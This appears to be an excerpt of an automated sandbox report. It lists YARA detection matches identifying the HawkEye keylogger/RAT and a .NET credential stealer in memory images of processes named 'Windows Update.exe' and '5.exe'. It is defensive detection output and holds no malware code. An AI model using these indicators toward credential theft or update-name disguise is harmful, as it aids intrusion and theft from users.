          Source: 10.2.Windows Update.exe.4ae0000.16.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.2.Windows Update.exe.4ae0000.16.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.Windows Update.exe.49d0e2d.10.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.2.Windows Update.exe.49d0e2d.10.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.1.Windows Update.exe.41b460.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.1.Windows Update.exe.41b460.3.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.1.Windows Update.exe.41b460.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.5.exe.41ce65.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.1.5.exe.41ce65.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.415058.14.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.415058.14.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.415058.14.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.Windows Update.exe.147b9265.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 6.2.Windows Update.exe.147b9265.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.4ae0000.55.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.4ae0000.55.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.4ae0000.55.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.41ce65.11.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.41ce65.11.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.5.exe.4b20000.15.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.2.5.exe.4b20000.15.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.2.5.exe.4b20000.15.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.7610000.60.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.415058.14.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.415058.14.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.415058.14.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.1.Windows Update.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.1.Windows Update.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.1.Windows Update.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.4ae8208.58.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.4ae8208.58.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.4ae8208.58.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.Windows Update.exe.4ae8208.18.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.2.Windows Update.exe.4ae8208.18.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.2.Windows Update.exe.4ae8208.18.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.1.5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.1.5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.400000.40.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.400000.40.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.400000.40.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.Windows Update.exe.147b7860.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 6.2.Windows Update.exe.147b7860.3.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 6.2.Windows Update.exe.147b7860.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.Windows Update.exe.4a56408.12.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.2.Windows Update.exe.4a56408.12.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.2.Windows Update.exe.4a56408.12.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.5.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.2.5.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.2.5.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.415058.41.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.415058.41.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.415058.41.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.Windows Update.exe.38c9660.6.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.2.Windows Update.exe.38c9660.6.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.2.Windows Update.exe.38c9660.6.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.49cf428.48.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.49cf428.48.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.49cf428.48.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.5.exe.415058.12.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.0.5.exe.415058.12.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.0.5.exe.415058.12.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.415058.12.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.415058.12.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.415058.12.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.5.exe.4a96408.14.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.2.5.exe.4a96408.14.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.2.5.exe.4a96408.14.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.400000.40.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.400000.40.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.400000.40.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.5.exe.41b460.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.2.5.exe.41b460.1.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.2.5.exe.41b460.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.41ce65.42.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.41ce65.42.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.5.exe.41ce65.10.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.0.5.exe.41ce65.10.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.290a338.44.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.2.Windows Update.exe.28e9124.4.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.2.Windows Update.exe.28e9124.4.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.2.Windows Update.exe.28e9124.4.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.28e9124.22.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.28e9124.22.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.28e9124.22.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.28e9124.43.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.28e9124.43.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.28e9124.43.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.290a338.21.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.2.Windows Update.exe.290a338.5.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 0000000A.00000002.391527665.00000000075C0000.00000004.00020000.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 0000000A.00000000.357304833.00000000075C0000.00000004.00020000.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 00000006.00000002.309901601.00000000147A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 00000006.00000002.309901601.00000000147A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 00000006.00000002.309901601.00000000147A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.388678020.00000000049C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 0000000A.00000002.388678020.00000000049C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.269857758.00000000148A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 00000001.00000002.269857758.00000000148A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 00000001.00000002.269857758.00000000148A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 00000015.00000000.380004808.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 00000015.00000000.380004808.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.306182092.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 0000000A.00000000.306182092.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.353745665.00000000038C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 0000000A.00000000.353745665.00000000038C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
